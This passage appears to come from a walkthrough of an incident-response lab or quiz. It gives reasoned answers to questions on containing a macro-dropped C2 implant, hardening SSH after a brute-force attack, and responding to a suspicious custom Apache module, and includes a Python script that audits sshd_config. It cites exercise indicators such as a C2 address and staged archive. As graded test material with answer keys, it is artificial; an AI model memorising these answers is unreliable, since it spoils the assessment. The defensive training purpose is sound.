  4. cmd.exe for malware delivery and explorer.exe for privilege escalation
    • cmd.exe was used but not for initial delivery
    • explorer.exe wasn't used for privilege escalation

Answer:

Macro-enabled document for initial access and a new service for persistence

Q58

After identifying that a macro-enabled document on WKS-RSCH01 dropped an executable that initiated C2 communication over a non-standard port, which of the following is the most appropriate immediate containment action?

Kill the process tree associated with the executable and isolate the host from the network

Kill the process tree associated with the executable and initiate credential resets for all domain users

Kill the process tree associated with the executable and disable all macros in the Office GPO across the organization

Kill all PowerShell sessions and block internet access for the affected subnet

Let me analyze each containment option based on incident response best practices:

Option 1: Kill the process tree associated with the executable and isolate the host from the network

  • ✓ Terminates active C2 communication immediately
  • ✓ Prevents lateral movement to other systems
  • ✓ Stops data exfiltration
  • ✓ Preserves evidence on the isolated host
  • ✓ Targeted, surgical response
  • ✓ Follows NIST containment principles

Option 2: Kill the process tree and initiate credential resets for all domain users

  • ✓ Kills malicious process
  • ✗ Credential reset is important but not immediate containment
  • ✗ Doesn't stop active C2 if process respawns via persistence
  • ✗ Mass credential reset causes organization-wide disruption
  • ✗ Should assess scope before mass reset

Option 3: Kill the process tree and disable all macros in Office GPO

  • ✓ Kills malicious process
  • ✗ GPO change takes time to propagate
  • ✗ Doesn't stop active C2 communication
  • ✗ Doesn't prevent lateral movement
  • ✗ Reactive to delivery method, not active threat

Option 4: Kill all PowerShell sessions and block internet access for subnet

  • ✗ Too broad - affects legitimate business operations
  • ✗ Subnet-wide blocking impacts multiple systems
  • ✗ Doesn't address the specific malicious executable (dochelp.exe)
  • ✗ May not stop C2 if using internal routes

Critical Context from Investigation:

  • dochelp.exe established C2 to 18.212.186.186:8080 (non-standard port)
  • Multiple persistence mechanisms installed (services, scheduled tasks)
  • Active credential dumping occurred
  • Data staging for exfiltration (ad.7z)

Most Appropriate Action: Kill the process tree to stop active execution AND isolate the host to prevent:

  • Lateral movement to DC01, FILE-SRV01
  • Further data exfiltration
  • C2 callback and additional payload downloads
  • While preserving evidence for forensics

Answer:

Kill the process tree associated with the executable and isolate the host from the network

Q59

In response to a brute-force SSH attack on WEB-APP01, which of the following actions would best help eradicate the root cause and reduce the system’s attack surface?

Restart the SSH service and block the attacker's IP address

Disable all user accounts

Disable SSH access for the root user and enforce key-based authentication

Block the attacker's IP address and change the SSH port from 22 to a randomized port

Option 1: Restart the SSH service and block the attacker's IP address

  • ✗ Temporary fix - attacker can use different IP
  • ✗ Doesn't address weak authentication mechanism
  • ✗ Minimal long-term security improvement

Option 2: Disable all user accounts

  • ✗ Prevents legitimate access
  • ✗ Causes operational disruption
  • ✗ Doesn't fix the underlying vulnerability
  • ✗ Not sustainable

Option 3: Disable SSH access for the root user and enforce key-based authentication

  • ✓ Eliminates password-based authentication vulnerability
  • ✓ Key-based auth resistant to brute-force attacks
  • ✓ Disabling root SSH reduces privileged attack surface
  • ✓ Industry best practice (CIS benchmarks, NIST guidelines)
  • ✓ Addresses root cause: weak authentication method
  • ✓ Long-term sustainable security improvement

Option 4: Block the attacker's IP and change SSH port (security through obscurity)

  • ✗ Port change is security through obscurity (port scanners find it)
  • ✗ IP blocking easily bypassed (VPN, proxies, botnets)
  • ✗ Doesn't fix authentication weakness
  • ✗ False sense of security

Root Cause Analysis: The brute-force attack succeeded because:

  • Password-based authentication was enabled
  • Weak/compromised credentials existed
  • No rate limiting or account lockout

Best Practice Solution: Enforce key-based authentication + disable root SSH access because:

  • Eliminates password guessing attacks
  • Cryptographic keys cannot be brute-forced practically
  • Reduces privileged access attack surface
  • Aligns with defense-in-depth principles

Answer:

Disable SSH access for the root user and enforce key-based authentication
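A way to verify the Q59 end state on a host rather than assert it: the Python below is an added example, not from this write-up, that resolves sshd_config the way sshd does (the first value read for a keyword wins, and directives after a Match line are conditional) and reports anything that still permits root or password logins. Both configuration fragments are constructed samples, and the fallback defaults (PermitRootLogin prohibit-password, PasswordAuthentication yes, MaxAuthTries 6) are those of current OpenSSH.

```python
import re

# Constructed sshd_config fragments (not from WEB-APP01): the weak one matches the root-cause findings
# above (password logins on, root reachable), the hardened one the recommended end state.
WEAK_SSHD_CONFIG = """\
# /etc/ssh/sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#PubkeyAuthentication yes
"""

HARDENED_SSHD_CONFIG = """\
# /etc/ssh/sshd_config (constructed sample)
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
MaxAuthTries 3
# a later duplicate never wins: sshd keeps the first value it reads for a keyword
PasswordAuthentication yes
Match User backup
    PasswordAuthentication yes
"""

# keyword (lower-case; sshd keywords are case-insensitive) -> (required value, finding text)
REQUIRED = {
    "permitrootlogin": ("no", "root can log in over SSH; set PermitRootLogin no"),
    "passwordauthentication": ("no", "password logins are enabled and brute-forceable; set PasswordAuthentication no"),
    "kbdinteractiveauthentication": ("no", "keyboard-interactive (PAM password) logins are enabled; set it to no"),
    "pubkeyauthentication": ("yes", "public-key authentication is off; set PubkeyAuthentication yes"),
}
# values sshd applies when a keyword is absent (current OpenSSH defaults)
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "kbdinteractiveauthentication": "yes", "pubkeyauthentication": "yes", "maxauthtries": "6"}
DIRECTIVE_RE = re.compile(r"(\S+?)\s*[=\s]\s*(\S.*)")     # "Keyword value" or "Keyword=value"

def effective_global_settings(text: str) -> dict:
    """Resolve global settings the way sshd does: first value wins, parsing stops at the first Match block."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = DIRECTIVE_RE.match(line) if line else None
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break                                           # everything after Match is conditional
        settings.setdefault(key, value)                     # a repeated keyword does not override
    return settings

def audit_sshd_config(text: str) -> list:
    """Findings against the Q59 end state: no root SSH, key-only authentication, fewer guesses per connection."""
    settings = effective_global_settings(text)
    findings = []
    for key, (required, message) in REQUIRED.items():
        actual = settings.get(key, DEFAULTS[key]).lower()
        if actual != required:
            origin = "" if key in settings else " (default)"
            findings.append(f"{message} [current: {actual}{origin}]")
    tries = int(settings.get("maxauthtries", DEFAULTS["maxauthtries"]))
    if tries > 4:
        findings.append(f"MaxAuthTries is {tries}; lower it to limit guesses per connection")
    return findings

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(label, audit_sshd_config(cfg) or ["no findings"])
```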

Q60

As an incident responder, which of the following should be your immediate priority upon detecting a custom Apache module compiled with "apxs" on a production web server?

Rebuild Apache from source

Isolate the host and preserve forensic artifacts

Confirm whether mod_authg.c is a known safe module

Restart the server to flush memory

Let me analyze each option based on incident response best practices:

Option 1: Rebuild Apache from source

  • ✗ Time-consuming process
  • ✗ Destroys forensic evidence
  • ✗ Doesn't contain active threat
  • ✗ Not immediate action

Option 2: Isolate the host and preserve forensic artifacts

  • ✓ Immediate containment - stops potential data exfiltration
  • ✓ Prevents lateral movement to other systems
  • ✓ Preserves evidence for investigation
  • ✓ Follows NIST/SANS incident response framework
  • ✓ Allows forensic analysis of the suspicious module
  • ✓ Maintains chain of custody

Option 3: Confirm whether mod_authg.c is a known safe module

  • ✗ Research takes time during active incident
  • ✗ Doesn't stop potential ongoing compromise
  • ✗ Custom compiled modules are inherently suspicious
  • ✗ Investigation phase, not containment

Option 4: Restart the server to flush memory

  • ✗ Destroys volatile evidence (memory artifacts, process state)
  • ✗ May trigger persistence mechanisms
  • ✗ Doesn't remove the malicious module from disk
  • ✗ Loses critical forensic data

Context from Investigation: From WEB-APP01, we observed:

  • Custom Apache module compilation (apxs)
  • Rootkit installation
  • Backdoor user creation
  • Active C2 communication

Incident Response Priority Order:

  1. Contain - Isolate to prevent spread
  2. Preserve - Maintain forensic evidence
  3. Investigate - Analyze artifacts
  4. Eradicate - Remove malicious components
  5. Recover - Restore operations

A custom-compiled Apache module on production is a critical security indicator suggesting:

  • Webshell/backdoor
  • Authentication bypass
  • Data exfiltration capability
  • Persistence mechanism

Answer:

Isolate the host and preserve forensic artifacts
